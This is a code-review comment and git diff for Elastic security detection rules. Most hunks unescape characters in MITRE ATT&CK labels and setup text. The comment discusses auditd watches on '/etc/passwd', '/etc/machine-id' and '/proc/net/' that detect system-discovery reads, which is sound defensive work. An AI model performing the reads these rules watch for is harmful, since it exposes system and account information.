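Review bot: The audit rules quoted in `setup` of the new `5c895b4f-9133-4e68-9e23-59902175355c_4.json` watch `/etc/machine-id` and `/etc/passwd` with `-p wa`, while the `query` matches `open` syscall records on those paths and the description calls the behaviour "file reads"; a `wa` watch only emits records for write and attribute-change accesses, so if the opens of interest are read-only the first two sequence stages may never see an event, whereas the `/proc/net/` watch already uses `-p r`. Worth confirming the rule fires end-to-end with exactly these three rules and, if read access is the intended trigger, widening the two watches to `-w /etc/machine-id -p rwa -k machineid` and `-w /etc/passwd -p rwa -k passwd`. Separately, `required_fields` declares `auditd.data.a2` with `"type": "unknown"` although the query compares it to the string `"1b6"` in every stage; stating the expected type (or why it is left unknown) would help whoever next touches the mapping. A prior revision of this setup text, visible earlier in the diff, wrapped the three `-w` lines in a fenced code block, while the new text leaves them as indented plain lines under a list item, which Markdown will fold into one paragraph.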
diff --git a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json index 84d3d02614f..01a47f604a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5c983105-4681-46c3-9890-0c66d05e776b_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json index 4f98d6e191e..c6984413617 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json index 6fd6601f614..37e7d355f92 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_2.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json index 54ffdf38382..6aa392a4007 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_3.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json index ec5593c817a..c14255aa33c 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_4.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json index 0228361641a..18fba24e14a 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_5.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json index dc7a603ab8b..8397b7c0cc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_102.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json index 93afdcf5eac..ddaa0cf1800 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json index d5ecc9ca498..b947fc1186f 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json index 64909669e95..3a9eaea9a58 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json index 4d5a1a0f673..69ed54eae2b 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json index 30873ad39c1..201447c0c7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json index 87c5669f3f0..b7ec60004fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json index 38c7abef477..5d6489c5e51 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json 
@@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json index 0ad2e318388..b26bfa7dd0e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json index db58d6b5738..ede054c2114 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json index 048b2aae931..21d719339a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json index c5186ea4f45..979c5684960 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
@@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json index e72753c8eb3..63d73034927 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json index 5d7238aa134..c1d241886d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json index ae329371dc2..5d94125d9d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json 
@@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json index d91054a1a42..0091a86a411 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json 
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json index 28b2c530181..40c71621899 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json index 9aa6f4af9f4..8d061a20c02 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json index 1c618a3e54b..8ffb19e92c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json 
@@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json index 554419804e5..4e5e40bc855 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json 
@@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json index d7650c0b7dc..386fac7c881 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json 
@@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json index 52b4d648768..9e71f868a37 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json 
@@ -76,7 +76,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json index ef56b2b8d56..690ef0cd46b 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json 
